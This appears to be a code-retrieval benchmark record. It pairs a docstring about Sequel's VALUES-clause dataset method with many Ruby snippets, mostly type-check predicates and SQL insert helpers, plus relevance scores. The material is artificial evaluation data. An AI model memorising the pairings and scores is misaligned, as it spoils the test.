"def is?(term, type_sym)\n return term[:type] == type_sym\n end",
"def valid_name?\n proto_table.key?(@name)\n end",
"def valid_type?\n %w[host web].include? type\n end",
"def valid?\n ENUM.include? @type.downcase.to_sym\n end",
"def type_registered?(klass_or_type)\n end",
"def is_type? sym\n self.class == Content::TYPES[sym]\n end",
"def has_type?\n ! get_internal_word(TYPE_INDEX).nil?\n end",
"def is_datatype?(); @type == GRT_DATATYPE; end",
"def type_allowed? type # Will check if the type is included in the list_types hash\n return @@list_types.keys.include?(type.to_sym)\n end",
"def can_be?(btype)\n backend_types.keys.include?(btype)\n end",
"def needs_encoding?\n ![ :binary, :date, :datetime, :boolean, :float, :integer ].include?(type)\n end",
"def valid_data_type_for_vendor?\n SUPPORTED_VENDOR_DATA_TYPES[@name].include?(@data_source.data_type)\n end",
"def valid_type?\n %w[ip domain cert].include? type\n end",
"def table?\n type == TYPE_CANONICAL\n end",
"def needs_encoding?\n ![ :binary, :date, :datetime, :boolean, :float, :integer ].include?(type)\n end",
"def mapping_name_is_valid?(mapping_name)\n mapping_name.class == Symbol\n end",
"def needs_word?\n if has_type? :reference\n return true\n end\n \n if has_type? :literal\n return true\n end\n \n #otherwise it is only a register or raw special value\n return false\n end",
"def is_string?(); @type == GRT_STRING; end",
"def is_sname?(); @type == GRT_SNAME; end",
"def table_exists?(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n\r\n return @engine.table_exists?(tablename)\r\n end",
"def string?\n type == \"STRING\"\n end",
"def builtin_type?\n\t\ttrue\n\tend",
"def sc_kind_of?(type)\n if not (type.kind_of?(Class) or type.kind_of?(String))\n raise ArgumentInvalidTypeError.new \"type\", type, 'class < SCObject', String\n end\n \n if type.kind_of?(Class) and type.ancestors.member?(SCObject)\n type = type.represented_sc_class\n end\n \n type = type.downcase\n result = sc_all_classes.detect do |val| \n val.downcase == type\n end\n return (not result.nil?)\n end",
"def use_table?()\n return key =~ /_T$/\n end",
"def valid_entity_type_name name\n @constellation.EntityType[[identifying_role_values, name]] or\n check_valid_nonexistent_object_type_name name\n end",
"def include_type_name?\n type_name != \"_doc\" || connection.version.to_i < 7\n end",
"def is_strclass?(); @type == GRT_STRCLASS; end",
"def is_a?(name)\n\ttarget = Units.parse_symbol(name)\n\t(target && @units.include?(target[:base])) || super(name)\n end",
"def builtin_type?\n\t\tfalse\n\tend",
"def has_class?(sym)\n `var str=' '+this.__native__.className+' ',match=' '+sym.__value__+' '`\n `str.indexOf(match) > -1`\n end",
"def alien?() is_type?( 'Alien'); end",
"def applies_type?(scope, type); end",
"def valid?\n [:region, :security_group, :security_key].all? do |var|\n self.send(var).is_a? String\n end\n end",
"def matches_type? identifier, type\n case type\n\n # Simple setter method,\n # as in this.setTitle('Projects')\n when \"setter\"\n /\\Aset(?=[[:upper:]])/.match(identifier).present?\n\n # Introduces translation scope,\n # as in Ext.define(\"ads.locale.en.view.project.List\", { ... })\n when \"scope\"\n %w[define create].include? identifier\n\n # First method in chained call,\n # as lookupReference in this.lookupReference('editButton').setText('Edit')\n when \"finder\"\n %w[lookupReference queryById].include? identifier\n\n # Attribute,\n # as in format: 'd-m-Y'\n when \"attribute\"\n not %w[override].include? identifier\n\n # Data compound attribute,\n # as in data: [ { \"name\" : \"Succeed\", \"value\": \"succeed\"} ]\n when \"data\"\n %w[data].include? identifier\n\n when \"any\"\n true\n else\n false\n end\n end",
"def valid_type?(type)\n super || extended_types.include?(type)\n end",
"def is_valid_attr_name?(attr_name)\n return false if attr_name.nil? or attr_name == \"\" or !attr_name.include?(':')\n \n column_family, column = attr_name.split(':', 2)\n return column_families.include?(column_family)\n end",
"def has_type?\n ! type.nil?\n end",
"def valid?(name = nil, type = nil)\n return valids(name, type).size == find(name, type).size\n end",
"def has_datatype?\n !datatype.nil?\n end",
"def valid_type?\n %w[ip domain].include? type\n end",
"def allowed?(val)\n case ftype\n when 'string', 'url'\n val.is_a?(String)\n when 'number'\n val.is_a?(Integer) || val.is_a?(Float)\n when 'sample'\n allowable_field_types.collect { |aft| aft.sample_type.id }.member? val.sample_type_id\n when 'item'\n allowable_field_types.collect { |aft| aft.object_type.id }.member? val.object_type_id\n end\n end",
"def valid_table_name?(name)\r\n name =~ /^([a-z]|[A-Z]){1}([a-z]|[A-Z]|\\d){2,62}$/\r\n end",
"def supports?(url)\n return @service_types.member?(url)\n end",
"def valid_table_name?(name)\n name =~ /^([a-z]|[A-Z]){1}([a-z]|[A-Z]|\\d){2,62}$/\n end",
"def type?(type)\n type = type.to_str\n\n types = param('TYPE')\n\n if types\n types = types.detect { |t| Vpim::Methods.casecmp?(t, type) }\n end\n end",
"def valid?\n %w(none set).include?(db.type(id))\n end",
"def auto_validate_types?\n @auto_validate_types\n end",
"def ensure_identified_name_type_matches\n return if name.blank? || non_conforming?\n return unless (identified_name_type = Names::IdentifyNameType[name])\n\n return if is_a?(identified_name_type)\n return if is_a?(SubtribeName) && Subtribe.valid_subtribe_name?(name)\n\n errors.add :name, <<~STR.squish\n type (`#{self.class.name}`) and identified name type (`#{identified_name_type.name}`) must match.\n Flag name as 'Non-conforming' to bypass this validation.\n STR\n end",
"def pbHasType?(type)\n if type.is_a?(String) || type.is_a?(Symbol)\n type = getID(PBTypes,type)\n end\n for pokemon in $Trainer.pokemonParty\n return true if pokemon.hasType?(type)\n end\n return false\nend",
"def is_name_value?(val)\n val.is_a?(String) || val.is_a?(Symbol)\n end",
"def contain?(name)\n conv_name = name.to_s.downcase.to_sym\n conversions.key?(conv_name)\n end",
"def has_attribute?(attr_name)\n attribute_types.key?(attr_name.to_s)\n end",
"def is_ustring?(); @type == GRT_USTRING; end",
"def knows?(name)\n false\n end",
"def has_symbol?(sym)\n\t\t\t@parameters.key?(sym) or @species.key?(sym)\n\t\tend",
"def is_valid?(types, item)\n types.each do |type|\n if type == :ipv4\n return true if ipv4?(item)\n elsif type == :domain\n return true if domain?(item)\n elsif type == :hash\n return true if hash?(item)\n elsif type == :classification\n return true if classification?(item)\n elsif type == :tag\n return true if tag?(item)\n elsif type == :bool\n return true if bool?(item)\n elsif type == :ssl_field\n return true if ssl_field?(item)\n elsif type == :whois_field\n return true if whois_field?(item)\n elsif type == :tracker_type\n return true if tracker_type?(item)\n end\n end\n return false\n end",
"def has_a_minimum_one_string_type?\n self.index_table_fields.map(&:field_name).each do |field_name|\n self.table_name.constantize.columns.each {|elt| return true if (elt.name == field_name && (elt.type == :string || elt.type == :text))} \n end\n return false\n end",
"def named?\n id.kind_of?(String)\n end",
"def string_class_name?(class_pair)\n class_pair.children[1].str_type?\n end",
"def supports_schema_parsing?\n respond_to?(:schema_parse_table, true)\n end",
"def validate_field_types\n database_field_names.each do |field|\n field_info = self.class.get_table_info.select {|hash| hash[\"name\"] == field}.first\n check_field_value_matches_data_type(field_info, field) \n end\n @errors\n end",
"def is_valid_name?(name)\n return name.class == String && name.match(/[a-zA-Z]+?/)\n end",
"def is_typed?(key, type)\n return (!datas.has_key?(key) or datas[key].kind_of?(type))\n end",
"def valid_attribute_type( attroid )\n\t\treturn self.valid_attribute_types.find {|attr_type| attr_type.valid_name?(attroid) }\n\tend",
"def gem_available?(name)\n Gem::Specification.find_by_name(name)\nrescue Gem::LoadError\n false\nend",
"def _has_attribute?(attr_name)\n attribute_types.key?(attr_name)\n end",
"def _has_attribute?(attr_name)\n attribute_types.key?(attr_name)\n end",
"def recognized?\n return !self.etypes.empty?\n end",
"def string?\n data_type == String\n end",
"def valid_search_type?(value)\n %w(characters).include? value\n end",
"def of_kind?(attribute, type = :invalid)\n attribute, type = normalize_arguments(attribute, type)\n\n if type.is_a? Symbol\n !where(attribute, type).empty?\n else\n messages_for(attribute).include?(type)\n end\n end",
"def respond_to?(symbol)\n @curl.respond_to?(symbol)\n end",
"def event_type_supported?\n return false if type = params[:type]\n SlackEvents.has_key?(type)\n end",
"def key?(name)\n ::Kernel.raise TypeError, \"name #{name} must convert to_sym\" unless name and name.respond_to?(:to_sym)\n @locals.has_key?(name.to_sym)\n end",
"def ltype?\n return true\n end",
"def type_of?(type)\n type.raw_type == raw_type\n end",
"def respond_to?( sym )\n\t\treturn true if @struct.member?( sym.to_s.sub(/(=|\\?)$/, '') )\n\t\tsuper\n\tend",
"def is_local_datastore?(name)\n !!name.match(/local-storage-\\d+|DAS\\d+/)\n end",
"def item_type_valid?\n res = item_type.safe_constantize\n errors.add :item_type, \"is not a valid class name: '#{item_type}'\" unless res\n end",
"def valid_type_for_datastream?(dsid, type)\n true\n end",
"def present?(key)\n types.key?(key.class)\n end",
"def object_storage?\n name.include?(\"ObjectStorage\")\n end",
"def requires_placeholder_type_specifiers?\n true\n end",
"def kind_of?(p0) end",
"def uses_record_type?\n list_class.attribute_names.include?('record_type')\n end",
"def valid_argument? name, type\n if name.nil? || name.empty? || name == type\n shell.say(\"ERROR: Invalid/missing argument.\") and false\n else\n true\n end\n end",
"def data_frame?(frame_type)\n %i(text binary).include?(frame_type)\n end",
"def storage_exists?(storage_name)\n statement = <<-EOS.compress_lines\n SELECT COUNT(*)\n FROM `information_schema`.`columns`\n WHERE `table_schema` = ? AND `table_name` = ?\n EOS\n\n query(statement, db_name, storage_name).first > 0\n end",
"def check_column column, table, col_types\n unless column.is_a? Symbol\n raise ArgumentError, \"#{column.inspect} not a Symbol\"\n end\n unless col_types[column]\n raise ArgumentError, \"#{column.inspect} is not a column in #{table}\"\n end\n end"
] |
[
"0.71684283",
"0.71072584",
"0.6997427",
"0.6890807",
"0.6834597",
"0.66947275",
"0.6680831",
"0.6505652",
"0.63379216",
"0.6317333",
"0.62921417",
"0.6221379",
"0.6195991",
"0.6191106",
"0.61868876",
"0.6179928",
"0.61571366",
"0.6141454",
"0.6141323",
"0.6129752",
"0.6092302",
"0.6017458",
"0.59997916",
"0.5994679",
"0.59903735",
"0.59760636",
"0.59741515",
"0.59565336",
"0.5953796",
"0.59319353",
"0.59204674",
"0.58828133",
"0.5871549",
"0.5865551",
"0.58620965",
"0.5851544",
"0.5817555",
"0.58045423",
"0.57888186",
"0.5763739",
"0.5743112",
"0.5723348",
"0.5722334",
"0.57179356",
"0.57107025",
"0.5688182",
"0.568647",
"0.5685024",
"0.56823844",
"0.56423616",
"0.5627312",
"0.56210685",
"0.56181437",
"0.5612063",
"0.5611495",
"0.561106",
"0.5605921",
"0.5605456",
"0.560519",
"0.5590214",
"0.5586232",
"0.55796146",
"0.5578201",
"0.5569207",
"0.55664015",
"0.5557887",
"0.55561584",
"0.555513",
"0.555507",
"0.5549126",
"0.5537519",
"0.55317575",
"0.552978",
"0.55270416",
"0.5526215",
"0.5519583",
"0.55113536",
"0.55113536",
"0.5508434",
"0.55008674",
"0.5499964",
"0.548827",
"0.54878455",
"0.54852074",
"0.5481428",
"0.5480955",
"0.54733616",
"0.54608077",
"0.54529756",
"0.5451615",
"0.54483175",
"0.54335773",
"0.5421639",
"0.5419926",
"0.5416991",
"0.5413296",
"0.5411062",
"0.541058",
"0.54085493",
"0.54057544"
] |
0.67410797
|
5
|
Creates a dataset that uses the VALUES clause: DB.values([[1, 2], [3, 4]]) VALUES ((1, 2), (3, 4)) DB.values([[1, 2], [3, 4]]).order(:column2).limit(1, 1) VALUES ((1, 2), (3, 4)) ORDER BY column2 LIMIT 1 OFFSET 1
|
def values(v)
raise Error, "Cannot provide an empty array for values" if v.empty?
@default_dataset.clone(:values=>v)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def select_values_sql(sql)\n sql << \"VALUES \"\n expression_list_append(sql, opts[:values])\n end",
"def test_values\n value = nil\n assert_nothing_raised do\n value = ActiveRecord::Base.connection.send(:select_rows, \"VALUES('ur', 'doin', 'it', 'right')\")\n end\n assert_equal [['ur', 'doin', 'it', 'right']], value\n end",
"def insert(column, values)\n values = Array(values)\n unless values.nil? or values.empty?\n @data.expand(values.count, column)\n [@data.rows_count, values.count].max.times { |index| (@data.values[index] ||= []).insert column, values[index] }\n end\n self\n end",
"def insert_many( sql, values, _options = {}, *args ) # :nodoc:\n number_of_inserts = 0\n\n base_sql, post_sql = case sql\n when String\n [sql, '']\n when Array\n [sql.shift, sql.join( ' ' )]\n end\n\n value_sets = ::ActiveRecord::Import::ValueSetsRecordsParser.parse(values,\n max_records: SQLITE_LIMIT_COMPOUND_SELECT)\n\n transaction(requires_new: true) do\n value_sets.each do |value_set|\n number_of_inserts += 1\n sql2insert = base_sql + value_set.join( ',' ) + post_sql\n insert( sql2insert, *args )\n end\n end\n\n ActiveRecord::Import::Result.new([], number_of_inserts, [], [])\n end",
"def insert_sql(*values)\n if values.empty?\n insert_default_values_sql\n else\n values = values[0] if values.size == 1\n \n # if hash or array with keys we need to transform the values\n if @transform && (values.is_a?(Hash) || (values.is_a?(Array) && values.keys))\n values = transform_save(values)\n end\n from = source_list(@opts[:from])\n\n case values\n when Array\n if values.empty?\n insert_default_values_sql\n else\n \"INSERT INTO #{from} VALUES #{literal(values)}\"\n end\n when Hash\n if values.empty?\n insert_default_values_sql\n else\n fl, vl = [], []\n values.each {|k, v| fl << literal(k.is_a?(String) ? k.to_sym : k); vl << literal(v)}\n \"INSERT INTO #{from} (#{fl.join(COMMA_SEPARATOR)}) VALUES (#{vl.join(COMMA_SEPARATOR)})\"\n end\n when Dataset\n \"INSERT INTO #{from} #{literal(values)}\"\n else\n if values.respond_to?(:values)\n insert_sql(values.values)\n else\n \"INSERT INTO #{from} VALUES (#{literal(values)})\"\n end\n end\n end\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select_sql(*values)\n ds = opts[:returning] ? self : returning\n ds.insert_sql(*values)\n end",
"def insert_select(*values)\n unless @opts[:disable_insert_returning]\n ds = opts[:returning] ? self : returning\n ds.insert(*values){|r| return r}\n end\n end",
"def insert(*values)\n if @opts[:sql] || @opts[:returning]\n super\n else\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def multi_insert_sql_strategy\n :values\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def add_data_values\n # remove any previous accepted values so that we can keep a track of what has been updated\n sqlclean = \"select clear_datacolumn_accepted_values(#{id})\"\n\n datatype = Datatypehelper.find_by_name(import_data_type)\n\n # I would like to change this so that the SQL is in one function but it wasn't working\n # TODO: I will look at this again - SR\n if datatype.name == 'text'\n sql = \"select accept_text_datacolumn_values(#{id})\"\n else\n dataset = Dataset.find(dataset_id)\n comment = ''\n comment = dataset.title unless dataset.nil?\n sql = \"select accept_datacolumn_values(#{datatype.id}, #{id}, #{datagroup_id}, '#{comment}')\"\n end\n\n begin\n connection = ActiveRecord::Base.connection()\n connection.begin_db_transaction\n connection.execute(sqlclean)\n connection.execute(sql)\n\n connection.commit_db_transaction\n rescue StandardError\n connection.rollback_db_transaction\n raise\n end\n end",
"def insert(values)\n primary_key_value = nil\n\n if primary_key && Hash === values\n primary_key_value = values[values.keys.find { |k|\n k.name == primary_key\n }]\n\n if !primary_key_value && connection.prefetch_primary_key?(klass.table_name)\n primary_key_value = connection.next_sequence_value(klass.sequence_name)\n values[klass.arel_table[klass.primary_key]] = primary_key_value\n end\n end\n\n im = arel.create_insert\n\n # ****** BEGIN PARTITIONED PATCH ******\n actual_arel_table = @klass.dynamic_arel_table(Hash[*values.map{|k,v| [k.name,v]}.flatten]) if @klass.respond_to?(:dynamic_arel_table)\n actual_arel_table = @table unless actual_arel_table\n # Original line:\n # im.into @table\n im.into actual_arel_table\n # ****** END PARTITIONED PATCH ******\n\n conn = @klass.connection\n\n substitutes = values.sort_by { |arel_attr,_| arel_attr.name }\n binds = substitutes.map do |arel_attr, value|\n [@klass.columns_hash[arel_attr.name], value]\n end\n\n substitutes.each_with_index do |tuple, i|\n tuple[1] = conn.substitute_at(binds[i][0], i)\n end\n\n if values.empty? # empty insert\n im.values = Arel.sql(connection.empty_insert_statement_value)\n else\n im.insert substitutes\n end\n\n conn.insert(\n im,\n 'SQL',\n primary_key,\n primary_key_value,\n nil,\n binds)\n end",
"def insert_select(*values)\n with_sql_first(insert_select_sql(*values))\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def insert(row, values)\n values = Array(values)\n unless values.empty?\n @data.expand(row, values.count)\n @data.values.insert row, Array.new([@data.columns_count, values.count].max) { |index| values[index] }\n end\n self\n end",
"def push(values)\n values = Array(values)\n unless values.empty?\n @data.expand(values.count, @data.columns_count)\n [@data.rows_count, values.count].max.times { |index| (@data.values[index] ||= []).push values[index] }\n end\n self\n end",
"def sql_literal(*)\n @dataset.sql\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n #We need comma separated values for our SQL statement. Let's join this array into a string:\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |column_name|\n values << \"'#{send(column_name)}'\" unless send(column_name).nil?\n end \n #The above code, however, will result in a values array. We need comma separated values for our SQL statement. Let's join this array into a string:\n values.join(\", \")\n end",
"def push(values)\n values = Array(values)\n unless values.empty?\n @data.expand(@data.rows_count, values.count)\n @data.values.push Array.new([@data.columns_count, values.count].max) { |index| values[index] }\n end\n self\n end",
"def insert_many( sql, values, *args ) # :nodoc:\n # the number of inserts default\n number_of_inserts = 0\n \n base_sql,post_sql = if sql.is_a?( String )\n [ sql, '' ]\n elsif sql.is_a?( Array )\n [ sql.shift, sql.join( ' ' ) ]\n end\n \n sql_size = QUERY_OVERHEAD + base_sql.size + post_sql.size \n\n # the number of bytes the requested insert statement values will take up\n values_in_bytes = self.class.sum_sizes( *values )\n \n # the number of bytes (commas) it will take to comma separate our values\n comma_separated_bytes = values.size-1\n \n # the total number of bytes required if this statement is one statement\n total_bytes = sql_size + values_in_bytes + comma_separated_bytes\n \n max = max_allowed_packet\n \n # if we can insert it all as one statement\n if NO_MAX_PACKET == max or total_bytes < max\n number_of_inserts += 1\n sql2insert = base_sql + values.join( ',' ) + post_sql\n insert( sql2insert, *args )\n else\n value_sets = self.class.get_insert_value_sets( values, sql_size, max )\n value_sets.each do |values|\n number_of_inserts += 1\n sql2insert = base_sql + values.join( ',' ) + post_sql\n insert( sql2insert, *args )\n end\n end \n\n number_of_inserts\n end",
"def insert values\n if $VERBOSE\n warn <<-eowarn\ninsert (#{caller.first}) is deprecated and will be removed in ARel 3.0.0. Please\nswitch to `compile_insert`\n eowarn\n end\n @engine.connection.insert compile_insert(values).to_sql\n end",
"def values(ids, common_value)\n common_values = [common_value] * ids.length\n convert_to_sql(ids.zip(common_values).each(&:flatten!))\n end",
"def multiple_value_sets_insert_sql(table_name, column_names, options) # :nodoc:\n \"INSERT #{options[:ignore] ? 'IGNORE ':''}INTO #{table_name} (#{column_names.join(',')}) VALUES \"\n end",
"def build values, options\n adapter_class.new(values, options).execute\n end",
"def _import(columns, values, opts=OPTS)\n if @opts[:returning]\n # no transaction: our multi_insert_sql_strategy should guarantee\n # that there's only ever a single statement.\n sql = multi_insert_sql(columns, values)[0]\n returning_fetch_rows(sql).map{|v| v.length == 1 ? v.values.first : v}\n elsif opts[:return] == :primary_key\n returning(insert_pk)._import(columns, values, opts)\n else\n super\n end\n end",
"def multi_insert_sql(columns, values)\n values = values.map {|r| \"SELECT #{expression_list(r)}\" }.join(\" UNION ALL \")\n [\"#{insert_sql_base}#{source_list(@opts[:from])} (#{identifier_list(columns)}) #{values}\"]\n end",
"def multiple(sql, values = [])\n r = $db.exec_params(sql, values)\n return [] if r.ntuples == 0\n r.map { |row| convert_to_ruby_types(row) }\nend",
"def insert_record(table, values)\n execute table_insert_query(table, values)\n end",
"def insert_sql(*values)\n if values.size == 1 && (v = values[0]).is_a?(Sequel::Model) && !v.respond_to?(:sql_literal_append)\n Sequel::Deprecation.deprecate(\"Passing Sequel::Model instance argument to Sequel::Dataset#insert\", \"Pass model_instance.values or model_instance.to_hash as the argument instead\")\n super(v.to_hash)\n else\n super\n end\n end",
"def prepare_explicit_statement(ds, type, vals=OPTS)\n f = ds.opts[:from]\n meth = type == :insert_select ? :returning : :select\n s = ds.opts[meth]\n if f && f.length == 1 && !ds.opts[:join] && (!s || s.empty?)\n ds = ds.send(meth, *columns.map{|c| Sequel.identifier(c)})\n end \n \n prepare_statement(ds, type, vals)\n end",
"def multi_insert_sql(columns, values)\n table = quote_identifier(@opts[:from].first)\n columns = literal(columns)\n values.map do |r|\n \"INSERT INTO #{table} #{columns} VALUES #{literal(r)}\"\n end\n end",
"def insert_facet_series(table, type, select = 'facet_id, series_id')\n $db.execute <<-SQL\n INSERT INTO destination.#{table}\n SELECT #{select}\n FROM facet_series\n WHERE type = '#{type}';\n SQL\nend",
"def insert values\n im = InsertManager.new @engine\n im.insert values\n @engine.connection.insert im.to_sql\n end",
"def to_sql\n sql = [\"select\"]\n select_values << \"*\" if select_values.empty?\n\n sql << select_values.uniq.join(\", \")\n\n sql << \"from #{build_series_name}\"\n\n sql << \"where #{where_values.join(\" and \")}\" unless where_values.empty?\n\n unless group_values.empty? && time_value.nil?\n group_fields = (time_value.nil? ? [] : [\"time(\" + @values[:time] + \")\"]) + group_values\n group_fields.uniq!\n sql << \"group by #{group_fields.join(\", \")}\"\n end\n\n sql << \"fill(#{fill_value})\" unless fill_value.nil?\n\n sql << \"order by #{order_values.uniq.join(\",\")}\" unless order_values.empty?\n\n sql << \"limit #{limit_value}\" unless limit_value.nil?\n sql << \"offset #{offset_value}\" unless offset_value.nil?\n sql << \"slimit #{slimit_value}\" unless slimit_value.nil?\n sql << \"soffset #{soffset_value}\" unless soffset_value.nil?\n sql << \"TZ('#{timezone_value}')\" unless timezone_value.blank?\n sql.join \" \"\n end",
"def sql_literal_append(ds, sql)\n check_columns!\n sql << 'ROW'\n ds.literal_append(sql, values_at(*columns))\n if db_type\n sql << '::'\n ds.quote_schema_table_append(sql, db_type)\n end\n end",
"def insert(*values)\n execute_dui(insert_sql(*values)){|c| return c.last_id}\n end",
"def returning(*values)\n if values.empty?\n cached_dataset(:_returning_ds) do\n raise Error, \"RETURNING is not supported on #{db.database_type}\" unless supports_returning?(:insert)\n clone(:returning=>EMPTY_ARRAY)\n end\n else\n raise Error, \"RETURNING is not supported on #{db.database_type}\" unless supports_returning?(:insert)\n clone(:returning=>values.freeze)\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n raise(Error, \"#{db.database_type} requires an order be provided if using an offset\") unless order = @opts[:order]\n dsa1 = dataset_alias(1)\n rn = row_number_column\n sql = @opts[:append_sql] || ''\n subselect_sql_append(sql, unlimited.\n unordered.\n select_append{ROW_NUMBER(:over, :order=>order){}.as(rn)}.\n from_self(:alias=>dsa1).\n limit(@opts[:limit]).\n where(SQL::Identifier.new(rn) > o).\n order(rn))\n sql\n end",
"def insert(column, value = :no_value)\n @columns << column\n @values << Translate.escape_sql(value) unless value == :no_value\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \") # join values array into a string separated by comma's\n end",
"def to_prepared_statement(type, values=nil, opts=OPTS)\n mods = opts[:extend] || []\n mods += [PreparedStatementMethods]\n\n bind.\n clone(:prepared_statement_name=>opts[:name], :prepared_type=>type, :prepared_modify_values=>values, :orig_dataset=>self, :no_cache_sql=>true, :prepared_args=>@opts[:prepared_args]||[]).\n with_extend(*mods)\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n\n # Let's iterate over the column names stored in #column_names and use the #send method with each individual column name to invoke the method by that same name and capture the return value:\n # values = []\n # self.class.column_names.each do |col_name|\n # values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n # end\n # Here, we push the return value of invoking a method via the #send method, unless that value is #nil (as it would be for the id method before a record is saved, for instance).\n # Notice that we are wrapping the return value in a string. That is because we are trying to craft #a string of SQL. Also notice that each individual value will be enclosed in single quotes, ' ', #inside that string. That is because the final SQL string will need to look like this:\n\n # INSERT INTO songs (name, album)\n # VALUES 'Hello', '25';\n # SQL expects us to pass in each column value in single quotes.\n # The above code, however, will result in a values array\n # [\"'the name of the song'\", \"'the album of the song'\"]\n # We need comma separated values for our SQL statement. Let's join this array into a string:\n # values.join(\", \")\n end",
"def convert_to_sql(array_of_values)\n array_of_values.inspect[1...-1].gsub('[', '(').gsub(']', ')')\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(*insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def flatten_to_sql(*values)\n flatten_safely(values) do |value|\n value = yield value if block_given?\n to_arel_sql(value)\n end\n end",
"def dynamic_values\n if @dynamic_values.blank?\n\n if self.column.blank?\n raise \"dynamic_values column not defined for filter_param_id = #{self.id}\"\n end\n\n query_result = self.dynamic_values_query.try(:query_result, nil, nil,\n :sample_option => ::Query::Sample::REAL,\n :sql_string => \"SELECT `#{self.column}` FROM {table_name}\"\n )\n result_set = query_result.try(:result_set)\n if !result_set.nil?\n @dynamic_values = result_set.try(:results_array).collect do |row|\n result_set.value_at(row, self.column)\n end\n end\n end\n\n @dynamic_values ||= []\n end",
"def select_values(sql, name = nil)\n result = select_rows(sql, name)\n result.map { |v| v[0] }\n end",
"def select_values values\n return unless values\n values.each do |val|\n row = @list.index val\n add_row_selection_interval row, row unless row.nil?\n end\n end",
"def <<(sql); execute((Array === sql) ? sql.to_sql : sql); end",
"def execute(*values)\n IBM_DB.execute(@stmt, values)\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n raise(Error, 'MSSQL requires an order be provided if using an offset') unless order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n unlimited.\n unordered.\n from_self(:alias=>dsa2).\n select{[WILDCARD, ROW_NUMBER(:over, :order=>order){}.as(rn)]}.\n from_self(:alias=>dsa1).\n limit(@opts[:limit]).\n where(rn > o).\n select_sql\n end",
"def insert!(*rows)\n Mao.sql(with_options(:insert => rows.flatten).sql) do |pg_result|\n if @options[:returning]\n pg_result.map {|result| Mao.normalize_result(result, @col_types)}\n else\n pg_result.cmd_tuples\n end\n end\n end",
"def insert_returning_columns(ds)\n return unless ds.supports_returning?(:insert)\n return unless values = ds.opts[:select]\n\n values = values.map{|v| ds.unqualified_column_for(v)}\n if values.all?\n values\n end\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n ds.insert(_insert_values)\n end",
"def _insert_raw(ds)\n if use_prepared_statements_for?(:insert)\n _set_prepared_statement_server(model.send(:prepared_insert, @values.keys)).call(@values)\n else\n super\n end\n end",
"def sqlite3_insert(table_name, values, mem_db)\n @assert.check_table_name(table_name, @dbh)\n\n table_ast = Hash.new\n table_ast = @dbm.get_table_ast(table_name)\n # TODO: Each value element type. All types are acceptable.\n # If hash, {key:value} needs to be {column_name:value}.\n\n # This hash holds a map of column position in the table\n index_to_column = Hash.new\n # Since the position of column in a table is static on\n # creation, we can keep a track of each column position\n # simple by assigning an index to each (A.K.A. indexing).\n tb_index = 0\n table_ast.each {|col_name, col_info|\n index_to_column[tb_index] = [col_name, col_info]\n tb_index += 1\n }\n\n @assert.check_class(values.class, Array, @dbh)\n vl_index = 0\n column_to_value = Hash.new\n values.each {|value|\n if value.class == Hash\n status = value.size == 1\n error_msg = \"Error: Size of hash for insert value cannot exeed 1.\\n\"\n error_msg += \"#{value} has size #{value.size}\"\n @assert.default_error_check(status, error_msg, @dbh)\n \n # Extract user input value\n col_name = value.keys[0]\n status = table_ast.has_key?(col_name.to_s)\n error_msg = \"Column #{col_name.to_s} does not exist in table #{table_name}.\\n\"\n error_msg += @dbm.get_table_schema(table_name)\n @assert.default_error_check(status, error_msg, @dbh)\n column_to_value[col_name.to_s] = value[col_name]\n else\n # Compare input value type with table column type\n cur_column_in_table = index_to_column[vl_index]\n @assert.check_column_value(cur_column_in_table, value, mem_db[table_name], @dbh)\n col_name = cur_column_in_table[0]\n column_to_value[col_name] = value\n end\n\n vl_index += 1\n }\n\n insert_query = \"INSERT INTO #{table_name} (\"\n column_to_value.each_key {|col_name|\n insert_query += \"#{col_name},\"\n }\n insert_query.chomp!(',')\n insert_query += \") VALUES (\"\n column_to_value.each_value {|value|\n if value.class == String\n insert_query += \"'#{value}',\"\n else\n insert_query += \"#{value},\"\n end\n }\n insert_query.chomp!(',')\n insert_query += ');'\n\n @dbh.execute(insert_query)\n return insert_query + \"\\n\"\n end",
